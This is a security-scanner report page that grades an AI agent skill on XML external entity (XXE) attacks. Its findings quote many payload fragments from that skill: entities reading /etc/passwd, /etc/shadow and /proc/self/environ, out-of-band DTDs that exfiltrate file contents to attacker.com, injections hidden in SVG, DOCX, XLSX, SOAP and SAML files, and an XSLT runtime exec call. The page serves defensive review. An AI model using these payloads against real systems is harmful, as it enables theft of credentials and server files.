xxe-xml-external-entity

github.com/yaklang/hack-skills

Verdict: Proceed with caution

0 critical26 high2 medium

SCORE 55 / 100

$skillox install xxe-xml-external-entitySoon

Why grade C?

score · 55 / 100

The current grade reflects 26 high-severity findings (3+ HIGHs → C).

0 CRIT26 HIGH2 MED0 LOW

To reach a higher grade

B
Reach Btarget score 75
Resolve 24 of 26 HIGH (cap is 2).
A
Reach Atarget score 95
Resolve all 26 HIGH.

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Latest scan findings

Scan crawl-p6o15p6ydi4jcvpweuaft68o · Thu, 28 May 2026 17:25:49 GMT · 7ms

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 34CWE-552

▾

32<?xml version="1.0" encoding="UTF-8"?>

33<!DOCTYPE foo [

34 <!ENTITY xxe SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

35]>

36<root><data>&xxe;</data></root>

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 39CWE-552

▾

37```

39If `/etc/passwd` reflects in response → confirmed file read.← sensitive path — credential-exfiltration vector

41---

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 79CWE-552

▾

77**Attacker's server hosts a malicious DTD** at `http://attacker.com/evil.dtd`:

78```xml

79<!ENTITY % file SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

80<!ENTITY % exfil "<!ENTITY exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">

81%exfil;

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 99CWE-552

▾

97```xml

98

99<!ENTITY % file SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

100<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///NONEXISTENT/%file;'>">

101%eval;

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 111CWE-552

▾

109**Linux**:

110```

111/etc/passwd← sensitive path — credential-exfiltration vector

112/etc/shadow (requires root)

113/etc/hosts

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 112CWE-552

▾

110```

111/etc/passwd

112/etc/shadow (requires root)← sensitive path — credential-exfiltration vector

113/etc/hosts

114/proc/self/environ ← environment variables (DB creds, API keys)

high

Sensitive filesystem path referenced

The skill references a path (`\/proc\/self\/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 114CWE-552

▾

112/etc/shadow (requires root)

113/etc/hosts

114/proc/self/environ ← environment variables (DB creds, API keys)← sensitive path — credential-exfiltration vector

115/proc/self/cmdline ← process command line

116/var/log/apache2/access.log ← may contain passwords in URLs

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 138CWE-552

▾

136<?xml version="1.0" standalone="yes"?>

137<!DOCTYPE svg [

138 <!ENTITY xxe SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

139]>

140<svg xmlns="http://www.w3.org/2000/svg" width="500" height="100">

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 158CWE-552

▾

156# Step 2: edit word/document.xml — add malicious DTD

157# Add after <?xml version="1.0" encoding="UTF-8" standalone="yes"?>:

158# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>← sensitive path — credential-exfiltration vector

159# Then use &xxe; inside document text

160

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 174CWE-552

▾

172<?xml version="1.0"?>

173<!DOCTYPE foo [

174 <!ENTITY xxe SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

175]>

176<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 205CWE-552

▾

203```xml

204<foo xmlns:xi="http://www.w3.org/2001/XInclude">

205 <xi:include href="file:///etc/passwd" parse="text"/>← sensitive path — credential-exfiltration vector

206</foo>

207```

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 220CWE-552

▾

218

219

220<!ENTITY xxe SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

221

222

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 223CWE-552

▾

221

222

223<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">← sensitive path — credential-exfiltration vector

224

225

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 246CWE-552

▾

244Use PHP filter for base64:

245```xml

246<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">← sensitive path — credential-exfiltration vector

247```

248

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 259CWE-552

▾

257□ Find XML input point (or JSON→XML transformation)

258□ Send basic entity: <!ENTITY xxe "test"> → &xxe; in body → does "test" reflect?

259□ If yes → file read: SYSTEM "file:///etc/passwd"← sensitive path — credential-exfiltration vector

260□ If no reflection → OOB test via Collaborator URL

261□ If OOB hit → set up attacker DTD for file exfiltration

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 280CWE-552

▾

278 <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

279 <!ENTITY % ISOamso '

280 <!ENTITY % file SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

281 <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">

282 %eval;

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 338CWE-552

▾

336```xml

337

338<!ENTITY % file SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

339<!ENTITY % exfil "<!ENTITY % send SYSTEM 'ftp://attacker.com:2121/%file;'>">

340%exfil;

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 349CWE-552

▾

347

348```xml

349<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">← sensitive path — credential-exfiltration vector

350<!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?d=%file;'>">

351%exfil;

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 383CWE-552

▾

381

382

383<!ENTITY % file SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

384<!ENTITY % s3 "<!ENTITY % exfil SYSTEM 'http://attacker.com/?d=%file;'>">

385%s3;

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 398CWE-552

▾

396|--------|-------------|-----------------|

397| **SOAP Envelope** | Entire body is XML | Add DOCTYPE before `<soap:Envelope>` |

398| **SVG Image** | SVG is XML | `<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>` in SVG header |← sensitive path — credential-exfiltration vector

399| **OOXML (.docx)** | `word/document.xml`, `[Content_Types].xml` | Inject DOCTYPE + entity into any XML member |

400| **OOXML (.xlsx)** | `xl/sharedStrings.xml`, `xl/worksheets/sheet1.xml` | Entity reference in cell values |

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 412CWE-552

▾

410

411<?xml version="1.0"?>

412<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>← sensitive path — credential-exfiltration vector

413<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">

414 <saml:Assertion>

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 432CWE-552

▾

430```xml

431<?xml version="1.0"?>

432<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>← sensitive path — credential-exfiltration vector

433<svg xmlns="http://www.w3.org/2000/svg" width="500" height="500">

434 <text x="10" y="50" font-size="14">&xxe;</text>

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 448CWE-552

▾

446# 2. Inject into xl/sharedStrings.xml

447# Add after XML declaration:

448# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>← sensitive path — credential-exfiltration vector

449# Replace a <t> element content with &xxe;

450

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 492CWE-552

▾

490```xml

491<!DOCTYPE foo [

492 <!ENTITY % file SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

493 <!ENTITY % eval "<!ENTITY % err SYSTEM 'jar:file:///nonexistent!/%file;'>">

494 %eval;

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 504CWE-552

▾

502

503```xml

504<!ENTITY % file SYSTEM "file:///etc/passwd">← sensitive path — credential-exfiltration vector

505<!ENTITY % int "<!ENTITY % trick SYSTEM 'file:///%file;'>">

506%int;

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 524CWE-552

▾

522<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

523 <xsl:template match="/">

524 <xsl:value-of select="document('file:///etc/passwd')"/>← sensitive path — credential-exfiltration vector

525 </xsl:template>

526</xsl:stylesheet>

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 538CWE-78

▾

536 <xsl:template match="/">

537 <xsl:variable name="rtObj" select="rt:getRuntime()"/>

538 <xsl:variable name="process" select="rt:exec($rtObj,'id')"/>← spawns a subprocess outside declared capabilities

539 </xsl:template>

540</xsl:stylesheet>

med

No capability manifest declared

The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.

rule: no-manifest

▾

View latest scan →

skillox.io/c/xxe-xml-external-entity

Skill facts

Latest grade: C · 55
Total scans: 1
Latest version: —
Last scanned: 2026-05-28
Source: yaklang/hack-skills

AIBOM

What this skill accesses

No manifest

Declared (from capabilities)

No capabilities block in frontmatter — the skill doesn't state what it should access.

Observed (from scan findings)

Subprocess invocations

<xsl:variable name="process" select="rt:exec($rtObj,'id')"/>

Filesystem paths

///etc/passwd
//filter/convert.base64-encode/resource=/etc/passwd
/etc/passwd
/etc/passwd`
/etc/shadow
/proc/self/environ

AIBOM (Application Skills Bill of Materials) — see /docs/concepts/aibom for the format.

Version history

Only this scan

No other scans on record for this skill name. New scans appear here as the catalog re-crawls or creators request a re-scan.

Embed badge

Show this grade in your README.

Tracks the latest grade automatically. Updates within five minutes of every re-scan.

Markdown

[![SkillOx grade](https://api.skillox.io/badge/xxe-xml-external-entity.svg)](https://skillox.io/c/xxe-xml-external-entity)

Markdown · score

[![SkillOx score](https://api.skillox.io/badge/score/xxe-xml-external-entity.svg)](https://skillox.io/c/xxe-xml-external-entity)

HTML

<a href="https://skillox.io/c/xxe-xml-external-entity"><img src="https://api.skillox.io/badge/xxe-xml-external-entity.svg" alt="SkillOx grade"/></a>

reST

.. image:: https://api.skillox.io/badge/xxe-xml-external-entity.svg
   :target: https://skillox.io/c/xxe-xml-external-entity
   :alt: SkillOx grade

Coming soon

Creator verification badge, expert-review status, and Cosign-signed release attestation appear here as those layers ship. AIBOM + version history are live; the others follow once the creator portal completes its identity-proof + signing surface.